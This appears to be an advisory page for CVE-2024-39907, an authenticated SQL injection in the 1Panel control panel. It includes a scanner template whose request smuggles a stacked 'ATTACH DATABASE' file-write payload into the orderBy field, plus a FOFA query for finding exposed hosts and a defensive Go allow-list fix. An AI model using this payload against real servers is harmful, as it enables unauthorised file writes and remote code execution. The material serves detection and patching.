CVE-2024-39907: 1Panel SQL Injection - Authenticated

Date: 2025-08-01 | Affected software: 1Panel | PoC: public

Vulnerability description

1Panel is a web-based Linux server management control panel. The project contains many SQL injection points, some of which are not properly filtered; they allow arbitrary file writes and ultimately remote code execution (RCE). These SQL injections were resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.

PoC code [public]

id: CVE-2024-39907

info:
  name: 1Panel SQL Injection - Authenticated
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
  reference:
    - https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-39907
    cwe-id: CWE-89
    epss-score: 0.85243
    epss-percentile: 0.99316
    cpe: cpe:2.3:a:fit2cloud:1panel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
    product: 1panel
    vendor: fit2cloud
  tags: cve,cve2024,sqli,1panel,authenticated

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        POST /api/v1/auth/login HTTP/1.1
        Host: {{Hostname}}
        EntranceCode: ZW50cmFuY2U=
        Content-Type: application/json

        {"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}

      - |
        POST /api/v1/hosts/command/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(body_2, "SQL logic error","table exp already exists")
          - contains(header_1, 'psession')
        condition: and
# digest: 4a0a004730450221008432761b0147336821aa5995d9e1c8a95d8fac4189b8860af2d12cfaee26c0f102201023c8b17a4e598149a0ea4365528053e597dc41a4acbb054286472133b1d423:922c64590222798bb761d5b6d8e72950
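The defect class exercised by the template's `orderBy` field is an ORDER BY clause assembled from request text. Column names and sort directions cannot be passed as bound parameters, so the mitigation is an allow-list that maps client-facing sort keys onto fixed SQL tokens. The Go example below is added here to illustrate that pattern; it is not 1Panel's code, and the column names, map layout and function names are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// sortColumns maps the sort keys the API accepts to real column names.
// Hypothetical names for illustration; not 1Panel's own schema.
var sortColumns = map[string]string{
	"name":       "name",
	"created_at": "created_at",
	"updated_at": "updated_at",
}

// sortDirections maps the client-facing "order" values (the request in the
// template sends "ascending") onto SQL keywords.
var sortDirections = map[string]string{
	"ascending":  "ASC",
	"descending": "DESC",
}

var ErrBadSort = errors.New("unsupported sort parameter")

// BuildOrderBy returns an ORDER BY fragment built only from allow-listed
// tokens. Request text is never copied into the SQL string; it only selects
// which fixed token is emitted, so a value such as
// "3;ATTACH DATABASE ..." can never reach the database engine.
func BuildOrderBy(orderBy, order string) (string, error) {
	col, ok := sortColumns[strings.ToLower(strings.TrimSpace(orderBy))]
	if !ok {
		return "", fmt.Errorf("%w: orderBy=%q", ErrBadSort, orderBy)
	}
	dir, ok := sortDirections[strings.ToLower(strings.TrimSpace(order))]
	if !ok {
		return "", fmt.Errorf("%w: order=%q", ErrBadSort, order)
	}
	return col + " " + dir, nil
}

func main() {
	frag, err := BuildOrderBy("created_at", "descending")
	fmt.Println(frag, err) // created_at DESC <nil>

	// Same shape as the injected value in the template above: rejected.
	_, err = BuildOrderBy("3;ATTACH DATABASE '/tmp/x.txt' AS test;", "ascending")
	fmt.Println(err)
}
```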
